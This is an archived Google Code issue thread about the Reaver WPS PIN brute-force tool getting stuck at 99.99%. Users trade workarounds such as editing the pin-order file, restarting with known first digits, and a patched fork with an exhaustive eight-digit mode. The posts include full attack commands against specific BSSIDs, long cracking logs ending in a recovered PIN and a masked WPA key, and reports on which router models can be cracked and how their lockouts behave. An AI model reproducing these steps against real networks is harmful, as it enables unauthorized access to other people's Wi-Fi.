Open GoogleCodeExporter opened 9 years ago
I Have The solution to resolve these problems. Rebuild the Pin guide file.
Reaver scan stops working, stacking at 9x.xx% or 99.99%. Sometimes repeats the same pin in loop and get WSC error.
Don’t know how and why these problems occur. Maybe a little bug in reaver or
the AP changes the pin in meantime.
But after a little research and some close tests I manage the solution to resolve these problems. Working fine every time when these errors happens.
First of all you have to be 100% sure that following things are ok:
*** The first 4 digits of pin. (THIS IS MOST IMPORTANT). I’ll show in the
final of post how to know if is real true)
*** Fair/Good Strength and quality of AP signal
My Case:
>>ESSID: TP_LINK-PSC
>>BSSID: F4:C3:F6:01:BD:1A
>>CHANNEL: 2
>>PIN First 4 DIGITS: 9104
Lets Begin:
1---You need to locate the reaver work directory, their will be a file with name “bssid of AP”.wpc and reaver.db
my case:
/usr/local/etc/reaver/ make a backup of this directory and erase that two
files.
F4C3F601BD1A.wcs and reaver.db
2----Set the Wi-Fi card in monitor mode in same channel of the target AP
3----Now start a new reaver scan, reaver -i “interface” -b “bssid” -e “essid” --t "time to wait M5/7" c “channel” -vv -n
In my case the input was:
reaver -i mon0 -b F4:C3:F6:01:BD:1A -e TP-LINK -t 0.9 -c 11 -vv -n
then press enter, you should see something like this
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
<cheffner@tacnetsol.com>
[+] Switching mon0 to channel 2
[+] Waiting for beacon from F4:C3:F6:01:BD:1A
[+] Associated with F4:C3:F6:01:BD:1A (ESSID: TP-LINK)
[+] Trying pin 12345670
(Note: you SHOULD NOT see the Restore question yet, if you do, something is
wrong. stop and Check if you are in the right directory. You can use the
command locate reaver.db to find the right one.)
After the THIRD pin check, stops the scan with CTRL+C ^c
my case the third was 01230153
[+] Trying pin 01230153
^C
[+] Nothing done, nothing to save.
-----4----Now comes the trick. In the reaver work folder open the "essid".wpc
file and you will see the are one column with multiple lines
each line with 4 numbers, this numbers are the sequence that reaver will follow
to find the first four numbers of pin.
So edit end change the 3333 and put your four digit.
my case
cat F4C3F601BD1A.wcs
2
0
0
1234
0000
0123
1111
2222
3333 > change for you first 4 pin number
4444
then
2
0
0
1234
0000
0123
1111
2222
9104
4444
Save and run reaver again.
This time WE WANT restore the previous scan
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
<cheffner@tacnetsol.com>
[+] Switching mon0 to channel 2
[?] Restore previous session for F4:C3:F6:01:BD:1A? [n/Y] y
[+] Restored Previous Session
[+] Waiting for beacon from F4:C3:F6:01:BD:1A
[+] Associated with F4:C3:F6:01:BD:1A (ESSID: TP-LINK)
[+] Trying pin 11110718
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending....
..... WSC NACK
[+] Sending WSC NACK
[+] 0.05% complete @ 2013-05-29 09:59:08 (11 seconds/pin)
[+] Trying pin 91040004
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received M5 message > (If You receive the M5 indicates that you have
the 4 first right digits.)
[+] Sending M6 message
[+] Received M5 message
[+] Received M5 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 91040008
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Received M5 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 90.19% complete @ 2013-05-29 09:59:44 (11 seconds/pin)
[+] Trying pin 91040010
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M3 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Received M5 message
[+] Received M5 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 91040017
Wait and you will see the count jumps to 90.00% with no bug anymore. and this
time reaver will try every possible combination.
after +-2 hours
........
[+] Trying pin 91040893
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message > (DONE!!!)
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 1092 seconds
[+] WPS PIN: '91040893'
[+] WPA PSK: 'xxxxxxxxxxxxx'
[+] AP SSID: 'TP-LINK'
* To ensure that you have the right first 4 digits, you need to check two thing
First You have to be able to receive the M5 Message, this indicate that first
half of pin are Right
Second when you set the pin, the percentage should get to 90%
Hope works to you guys like worked for me. If you still get stuck do all over
again, happens to me when the signal was weak..
you can try this before or after the Stefano's Solution.
That it, Good Luck
And Remember only test AP with permission of the owner. :)
Original comment by morenohe...@gmail.com
on 29 May 2013 at 7:34
Hi,
Some months ago I jumped directly into this issue and, after seeing some of the
comments here, I went directly into downloading the code and fixing the issue.
At the moment I have a completely functional version with the following
features:
1. Fixed the 99.9% never ending loop: If the end is reached without success,
the application exits as expected. (before it continued until it was
interrupted or killed)
2. Added an exhaustive option (--exhaustive, -X) which uses "set_p1(p1_index) +
set_p1(p2_index)" instead of "set_p1(p1_index) + set_p2(p2_index)" to force
covering all possible combinations. This ensures that the PIN is found even if
it does not follow the "checksum" rules. However this makes of corse the
process much longer.
3. If the -X option is not provided, the application runs as usual. However, if
it reaches the end without having found a valid PIN, it gets the first half of
the PIN which has been already found and restarts scanning for the second one
in exhaustive mode. This makes the overall process much longer in the worst
scenarios, but this ensures that the PIN is finally found in all cases (if the
signal is strong enough).
4. Added two options: (--p1-index, -1) and (--p2-index, -2) which allows
setting an initial value for the respective indexes. Useful if you lost a
previous session.
5. Added some "aesthetic" improvements, such as displaying the elapsed time and
the estimated remaining time in AdBhCmDs format, or displaying each time the
Pin counter and the Max Pin attempts (in verbose mode).
And, here you have a snapshot of the new output, making use of the new "-2"
option as an example, including the instant in which the mode changes from
"checksum" to "exhaustive" (notice how the "Max pin attempts" increases to
20000 and how Pin count goes down to 10001) and displaying the elapsed and
remaining time:
# reaver -i mon0 -c 6 -b XX:XX:XX:XX:XX:XX -v -S -t7 -d 10 -p 4247 -2 998
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
<cheffner@tacnetsol.com>
[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: XXXX)
[+] Starting Cracking Session. Pin count: 10998, Max pin attempts: 11000
[+] Trying pin 42479970.
[+] Pin count advanced: 10999. Max pin attempts: 11000
[+] Trying pin 42479987.
[+] Pin count advanced: 11000. Max pin attempts: 11000
[+] Checksum mode was not successful. Starting exhaustive attack
[+] Trying pin 42471234.
[+] Pin count advanced: 10001. Max pin attempts: 20000
[+] Trying pin 42470000.
[+] Pin count advanced: 10002. Max pin attempts: 20000
[+] Trying pin 42470123.
[+] Pin count advanced: 10003. Max pin attempts: 20000
[+] Trying pin 42471111.
[+] Pin count advanced: 10004. Max pin attempts: 20000
[+] 50.02% complete. Elapsed time: 0d0h1m18s.
[+] Trying pin 42472222.
[+] Pin count advanced: 10005. Max pin attempts: 20000
[+] Trying pin 42473333.
[+] Pin count advanced: 10006. Max pin attempts: 20000
[+] Trying pin 42474444.
[+] Pin count advanced: 10007. Max pin attempts: 20000
[+] Trying pin 42475555.
[+] Pin count advanced: 10008. Max pin attempts: 20000
[+] Trying pin 42476666.
[+] Pin count advanced: 10009. Max pin attempts: 20000
[+] 50.04% complete. Elapsed time: 0d0h2m22s.
[+] Estimated Remaining time: 1d9h18m12s
[+] Trying pin 42477777.
[+] Pin count advanced: 10010. Max pin attempts: 20000
The weird thing about all this is that I already sent two messages to the
project owners asking for commit permissions to upload my patch and I got
absolutely NO response from them. At all!
I am not a big friend of the "forking" concept, but man, it's been more than
one year since the last signs of life from the committers, and it's a pitty to
have such a useful project just abandoned where there are plenty of issues and
volunteers to solve them!
May we think about it?
Original comment by c.sala....@gmail.com
on 18 Jun 2013 at 12:06
carles, in case you don't get a response from the original developers can you
share the your source code changes here? It seems like you created a better
version and there is no need to reinvent the wheel
Original comment by erhance...@gmail.com
on 23 Jun 2013 at 11:40
Hi,
I received several requests about those modifications, so I made them public in
pastebin: http://pastebin.com/EcWw7e7n
Here you have the instructions to install the changes in linux:
- Download a fresh version of the code (revision 113).
- go to this link: http://pastebin.com/EcWw7e7n
- Paste the contents into a patch file inside the trunk folder (let's say,
reaver-wps.patch)
- execute the following command from inside the trunk folder (without quotes):
"patch -p1 < reaver-wps.patch"
- follow the reaver build and installation instructions as usual.
If you have any issues, please feel free to send me an e-mail and I'll try to
give you a hand.
Regards,
Carles
Original comment by c.sala....@gmail.com
on 29 Jun 2013 at 11:55
Hi¡ great work Carles.sala, it will be interesting if you could made a mod
with your changes so the lazy noobs like me that dont know nothing about
programming could install the reaver mod instead of doing all that anoying
work¡ you could load it in rapidshare or similar.
Thanks in advance.
Original comment by Lamonafi...@gmail.com
on 2 Jul 2013 at 5:12
Yeah, I agree with Lamonafi,
I really appreciate If you do that.
Original comment by saeed.y2...@gmail.com
on 2 Jul 2013 at 9:25
Hi,
Some of you reported having problems with the patch (apparently pastebin
modifies slightly the pasted text (white spaces and so on) and then patch does
not pick up the changes as expected).
Therefore, I finally opted for creating a fork repository
(http://code.google.com/p/reaver-wps-fork/) where this issue is already fixed.
I still didn't have time to prepare and upload the binaries, but the version is
ready to download and install.
Here you have the steps which you can just copy/paste (run as root!):
NOTE: If you are running ubuntu, make sure you have libsqlite3-dev installed:
# apt-get install libsqlite3-dev
# svn checkout http://reaver-wps-fork.googlecode.com/svn/trunk/
reaver-wps-fork-read-only
# cd reaver-wps-fork-read-only/src
# ./configure
# make distclean && ./configure #(you can skip this step if you never installed
reaver before)
# make
# make install
If you have any doubts, or you want to contribute in the project with your own
changes, please feel free to contact me.
Regards,
Carles
Original comment by c.sala....@gmail.com
on 7 Jul 2013 at 12:15
[deleted comment]
Hi c.sala¡ I test your program today , works fine but sessions cant be saved.
What comand should I use if i want to start the pin count in 5267 3000 for
example? (I know the first 4 digits).
Thanks.
Original comment by Lamonafi...@gmail.com
on 8 Jul 2013 at 8:01
i installed the patch "patch -p1 < reaver-wps.patch" and now reaver doesnt
compile at all. how do i uninstall?
Original comment by J0J0...@gmail.com
on 25 Jul 2013 at 5:28
[deleted comment]
[deleted comment]
I installed the patch, this is the output
[+] Waiting for beacon from XX:C6:XX:62:F2:XX
[+] Associated with XX:C6:XX:62:F2:XX (ESSID: xxxxxxx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.
[+] Pin count advanced: 10001. Max pin attempts: 11000
[+] Trying pin 12340002.
[+] Pin count advanced: 10002. Max pin attempts: 11000
[+] Trying pin 12342228.
[+] Pin count advanced: 10003. Max pin attempts: 11000
[+] Trying pin 12343331.
[+] Pin count advanced: 10004. Max pin attempts: 11000
[+] Trying pin 12344444.
[+] Pin count advanced: 10005. Max pin attempts: 11000
[+] 90.95% complete. Elapsed time: 0d0h1m9s.
[+] Trying pin 12345557.
[+] Pin count advanced: 10006. Max pin attempts: 11000
[+] Trying pin 12346660.
[+] Pin count advanced: 10007. Max pin attempts: 11000
[+] Trying pin 12347773.
[+] Pin count advanced: 10008. Max pin attempts: 11000
[+] Trying pin 12348886.
[+] Pin count advanced: 10009. Max pin attempts: 11000
[+] Trying pin 12349999.
[+] Pin count advanced: 10010. Max pin attempts: 11000
[+] 91.00% complete. Elapsed time: 0d0h2m7s.
[+] Estimated Remaining time: 0d3h1m30s
[+] Trying pin 12340019.
[+] Pin count advanced: 10011. Max pin attempts: 11000
[+] Trying pin 12340026.
[+] Pin count advanced: 10012. Max pin attempts: 11000
[+] Trying pin 12340033.
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12340033.
[+] Pin count advanced: 10013. Max pin attempts: 11000
[+] Trying pin 12340040.
[+] Pin count advanced: 10014. Max pin attempts: 11000
[+] 91.04% complete. Elapsed time: 0d0h3m5s.
[+] Estimated Remaining time: 0d3h50m4s
[+] Trying pin 12340057.
[+] Pin count advanced: 10015. Max pin attempts: 11000
[+] Trying pin 12340064.
[+] Pin count advanced: 10016. Max pin attempts: 11000
[+] Trying pin 12340071.
[+] Pin count advanced: 10017. Max pin attempts: 11000
[+] Trying pin 12340088.
[+] Pin count advanced: 10018. Max pin attempts: 11000
[+] Trying pin 12340095.
[+] Pin count advanced: 10019. Max pin attempts: 11000
[+] 91.08% complete. Elapsed time: 0d0h4m3s.
[+] Estimated Remaining time: 0d2h59m51s
[+] Trying pin 12340101.
[+] Pin count advanced: 10020. Max pin attempts: 11000
[+] Trying pin 12340118.
[+] Pin count advanced: 10021. Max pin attempts: 11000
[+] Trying pin 12340125.
[+] Pin count advanced: 10022. Max pin attempts: 11000
[+] Trying pin 12340132.
[+] Pin count advanced: 10023. Max pin attempts: 11000
[+] Trying pin 12340149.
[+] Pin count advanced: 10024. Max pin attempts: 11000
[+] 91.13% complete. Elapsed time: 0d0h5m2s.
[+] Estimated Remaining time: 0d2h58m56s
[+] Trying pin 12340156.
[+] Pin count advanced: 10025. Max pin attempts: 11000
[+] Trying pin 12340163.
[+] Pin count advanced: 10026. Max pin attempts: 11000
[+] Trying pin 12340170.
[+] Pin count advanced: 10027. Max pin attempts: 11000
[+] Trying pin 12340187.
[+] Pin count advanced: 10028. Max pin attempts: 11000
[+] Trying pin 12340194.
[+] Pin count advanced: 10029. Max pin attempts: 11000
[+] 91.17% complete. Elapsed time: 0d0h5m59s.
[+] Estimated Remaining time: 0d2h58m1s
[+] Trying pin 12340200.
[+] Pin count advanced: 10030. Max pin attempts: 11000
[+] Trying pin 12340217.
[+] Pin count advanced: 10031. Max pin attempts: 11000
[+] Trying pin 12340224.
[+] Pin count advanced: 10032. Max pin attempts: 11000
[+] Trying pin 12340231.
[+] Pin count advanced: 10033. Max pin attempts: 11000
[+] Trying pin 12340248.
[+] Pin count advanced: 10034. Max pin attempts: 11000
[+] 91.22% complete. Elapsed time: 0d0h6m57s.
[+] Estimated Remaining time: 0d2h57m6s
waiting for reaver to finish
Original comment by rbeldua
on 2 Aug 2013 at 5:54
[+] Trying pin 12349975.
[+] Pin count advanced: 10999. Max pin attempts: 11000
[+] Trying pin 12349982.
[+] Pin count advanced: 11000. Max pin attempts: 11000
[+] 100.00% complete. Elapsed time: 0d3h26m13s.
[+] Estimated Remaining time: 0d3h26m13s
[+] Checksum mode was not successful. Starting exhaustive attack
[+] Trying pin 12341234.
[+] Pin count advanced: 10001. Max pin attempts: 20000
[+] Trying pin 12340000.
[+] Pin count advanced: 10002. Max pin attempts: 20000
[+] Trying pin 12340123.
[+] Pin count advanced: 10003. Max pin attempts: 20000
[+] Trying pin 12341111.
[+] Pin count advanced: 10004. Max pin attempts: 20000
[+] Trying pin 12342222.
[+] Pin count advanced: 10005. Max pin attempts: 20000
[+] 50.02% complete. Elapsed time: 0d3h27m29s.
[+] Estimated Remaining time: 0d3h27m29s
why it restarts at 50%?
Original comment by rbeldua
on 2 Aug 2013 at 10:45
[deleted comment]
[deleted comment]
Hi,
#60 and #62: I already said in my comment #57 that the patch was messed up by
pastebin and that it didn't work as expected.
Please checkout the version from reaver-wps-fork project
(http://reaver-wps-fork.googlecode.com/svn/trunk/), which does compile properly.
#64: I explained that in comment #52. The 99.99% problem appeared because the
WPS pin which you are trying to crack does not follow the checksum rule.
Therefore, in the new version of reaver-wps, when it reaches the end of the
checksum pins it assumes that yours is "non standard" and jumps automatically
to the exhaustive mode, which brute forces all 8 digits instead of brute
forcing 7 of then and calculating the last one using a checksum.
This has two big consequences:
On one side, chances of matching the pin increase dramaticallty.
However, on the other side, the crack time for one of those non-standard pins
can be of several days instead of several hours (bear in mind that, before,
this kind of pins could not be creacked at all using reaver "as-was").
I hope this clears up your doubts.
Original comment by c.sala....@gmail.com
on 3 Aug 2013 at 2:06
[deleted comment]
[deleted comment]
Thank you Carles,
I do not have Internet at home, making installation of this patch impossible.
Can you rap it up and upload it somewhere¿
Again thank you!
Original comment by sairesea...@gmail.com
on 9 Aug 2013 at 11:41
Hi c.sala! Can you please make possible for reaver to save changes and restart
the same session,pls pls can you do this?
thanks for great job!
Original comment by ohnostra...@gmail.com
on 12 Aug 2013 at 3:53
how to install this patch onto a live usb installation?
root@kali:~# svn checkout http://reaver-wps-fork.googlecode.com/svn/trunk/
reaver-wps-fork-read-only
Checked out revision 3.
root@kali:~#
root@kali:~# cd reaver-wps-fork-read-only/src
root@kali:~/reaver-wps-fork-read-only/src# ./configure
checking for gcc... gcc
checking whether the C compiler works... yes
checking for C compiler default output file name... a.out
checking for suffix of executables...
checking whether we are cross compiling... no
checking for suffix of object files... o
checking whether we are using the GNU C compiler... yes
checking whether gcc accepts -g... yes
checking for gcc option to accept ISO C89... none needed
checking for pcap_open_live in -lpcap... no
error: pcap library not found!
root@kali:~/reaver-wps-fork-read-only/src#
Original comment by sairesea...@gmail.com
on 12 Aug 2013 at 9:05
how do I install this without Internet connexion?
Original comment by sairesea...@gmail.com
on 13 Aug 2013 at 10:36
Hi Carles. First, thanks for doing the patched version!
Downloaded & installed it (v3) as per http://code.google.com/p/reaver-wps-fork/
Runs fine for a bit, but then throws 'Floating point exception' after a
percent-complete line, see cmdline & output below. Any ideas? Let me know if
more info would help.
reaver -i mon0 -b 55:66:77:88:99:AA -vv -c 1 -d 4 -t 10 -x 305 -S -p 8983 -X
-2 19
...
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 89830034.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 89830034.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 89830034.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] 50.23% complete. Elapsed time: 0d0h8m5s.
Floating point exception
Original comment by lord.bla...@gmail.com
on 16 Aug 2013 at 9:30
same as #74
[+] Trying pin 12343126.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] 93.82% complete. Elapsed time: 0d0h2m33s.
Floating point exception
Original comment by sairesea...@gmail.com
on 17 Aug 2013 at 2:20
syntax was...
reaver -i mon0 -c 11 -b BC:76:70:E0:71:EC -vv -p 1234 -2 310
Original comment by sairesea...@gmail.com
on 17 Aug 2013 at 2:24
OK, a bit more info to add to #74:
1. The floating point error is fairly rare, what's more common is to simply
stop without error (or answer).
2. The problem only happens immediately after the "% complete. Elapsed time: "
line.
3. The problem seems to happen only after multiple WPS transaction fails.
Hope that helps!
Original comment by lord.bla...@gmail.com
on 18 Aug 2013 at 9:37
Yes, agree with #77 that the Floating point exception it is a rare thing and
happens only (in my case) within the first minute of a session. The last time
it did it, the syntax was very simple and without any new arguments (reaver -i
mon0 -c 11 -b BC:76:70:XX:XX:XX -vv).
Getting back to the 99% bug... The fallowing may or may not be related.
Reaver 1.4 has problems with certain routers. Namely Huawei routers (BSSID
BC:76:70: ...)
1. Does not detect the fist correct four numbers of the PIN, instead giving a
false positive with 1234, or any four digits you give it, and return the
"received M5 message".
2. The first problem causes the 99% bug and repeats the last key at the end.
Solution: Reaver 1.3
With a very simple syntax in reaver 1.3 (reaver -i mon0 -c 11 -b
BC:76:70:DD:0A:28 -vv) I retrieved the information! I did EVERYTHING spending
DAYS trying with reaver 1.4 and this version (1.4 fork r3) without any success.
@ Carles
any chance for you to include a '-3' argument in the next version?
-3 as in 'operate like reaver 1.3'
Original comment by sairesea...@gmail.com
on 20 Aug 2013 at 4:08
[deleted comment]
[deleted comment]
Hi Carles, "Floating point exception" here too.
Original comment by dave...@gmail.com
on 24 Aug 2013 at 7:09
i have the same problem here, and seems to happen only after multiple WPS
transaction fails, it just stops without answer. im now trying with reaver 1.3
that seems to be working fine.
Original comment by ushpacor...@gmail.com
on 29 Aug 2013 at 6:11
hello, as i said before reaver 1.3 is working but i still have the 99.99%
problem because the first 4 numbers are independent from the others, is
arbitrary and is not in the numbers that reaver tries for the second half. im
basically were i started, now reaver actually gets the true four first numbers
(no M5 false positive) but get stuck at 99.99% and the fork isnt working
either, does anyone knowns how to solve the 99% loop?
Original comment by ushpacor...@gmail.com
on 30 Aug 2013 at 3:16
I've personally had this problem both with my Alfa 802.11 g/n (the g/n unit
came with my Reaver Pro) and an older Alfa 802.11 b/g USB device (RTL8187).
However my Inetel Centrino Ultimate-n 6300 has no problems on the same
laptop. I've also noticed that all three cards can connect to any of their
compatible access point standards, can send deauth packets but the Alfa's
cannot capture hand shakes using fern, wifite or even manually using tshark
or cowpatty (cowpatty just produces empty files). Not sure if that helps
give insight in to the 99.99% problem or not. To be clear, the Alfa's will
only make it to 99.99% but the Intel will work every time. (Backtrack 5r3,
Kali)
Original comment by brock1...@gmail.com
on 30 Aug 2013 at 4:04
Hi all,
Sorry for not responding to your comments (which I really appreciate), but it
has been a while since I last came to this thread and I still hadn't seen them.
@Chris: I'm glad to see that you managed to install it without internet,
however I cannot give a solution for the 1.3 idea. For sure it could be done,
but I suspect it would be a hard thing to implement, and probably not as worth
as just looking forward and fixing the current issues. Anyway, I will take 1.3
version as a reference when trying to fix them.
@Steven and the others with the "Floating point Exception" error: There's
already an issue created in the fork repo:
http://code.google.com/p/reaver-wps-fork/issues/detail?id=1
Would you mind following the issue there and uploading any relevant info? I
must say that I had few time to work on it, and actually I could not manage to
reproduce the error with any of my routers, but I'll do what I can to fix it.
@Mali: Sure, I will try to fix this. Would you mind creating an issue for it in
the new repo?
Then it will be easier to follow up.
Regards,
Carles
Original comment by c.sala....@gmail.com
on 16 Sep 2013 at 10:28
@Carles how do you run exhaustive mod in the 2nd scan for the 1st 4 digit? i
always got the 1234 for the 1st 4 pin in 2nd scan somebody says that it's false
positive and i'm receiving M5 message. can you post the code plss?
Original comment by johnjero...@gmail.com
on 26 Sep 2013 at 1:42
HI !
I m sorry for this question but I tried to follow stefano and I don't have a
folder called reaver-wps-read-only so the following step couldn't be done :
cd /root/reaver-wps-read-only/src
THANKS
Original comment by amer.hag...@gmail.com
on 24 Oct 2013 at 10:20
Hello Carles, I have the same problem: "Floating point exception (core
dumped)".
I was trying to find correct pin on "3Webcube" router, but with no success.
Can you please help me to solve the problem?
I will be grateful to you.
K.
Original comment by djkam...@gmail.com
on 6 Nov 2013 at 11:08
Same problems with trying to crack a small Edimax router. Version 1.4 got stuck
at 90.90%, the new one gave me a "flouting point exception". It may be because
I am short of memory. (Using Kali Linux, Dell LAtitude E6500 but only 2GB of
memory) So I tried version 1.3 and it found both the WPS PIN and the WSK
passkey in 4,033 seconds.
so a Edimax BR-6258n can be cracked with version 1.3 of reaver. Hope this helps
someone.
Original comment by cjf.corc...@gmail.com
on 30 Dec 2013 at 1:52
Ok just succeeded with a netgear WN2000RPTv2, using reaver 1.3. I had it do it
two halves, it stopped at 91.87%, which meant it had found the 1st pin. So I
restarted adding the --pin parameter as follows
"reaver -i mon0 -b <bssid> -c <channelNum> -d --pin 3969"
This unit locks out after 30 bad attempts, then re enables the WPS PIN in 120
to 300 seconds, ie just left it running..... I can also confirm that disabling
the WPS PIN in the netgear GUI disables the WPS functionality on this device.
BTW BTHUB3's now appear to lock out the PIN functionality permanently if it
gets something like 20 wrong PIN's.
Original comment by cjf.corc...@gmail.com
on 30 Dec 2013 at 6:13
SOME ONE PLEASE FORK reaver already!!!! It is deader than the grim-reaper him
self!.. If no one forks it, it will NEVER BE UPDATED EVER AGAIN!!..
Original comment by Yas...@gmail.com
on 13 Jun 2014 at 7:36
Has anyone encountered a router that will send out one M5 packet causing reaver
to think it has the correct first four pins when it doesnt?
I'm not sure if it sends it out then changes the pin or what happens, but after
it sends out the one initial M5 packet no more get sent out. This causes
reaver to enter the 99% loop never finding the solution.
Signal is -67 and I don't seem to have any difficulties receiving or sending
packets. What gives?
Original comment by psychede...@gmail.com
on 28 Aug 2014 at 2:25
Original issue reported on code.google.com by
darknw...@gmail.com
on 28 Jan 2012 at 10:30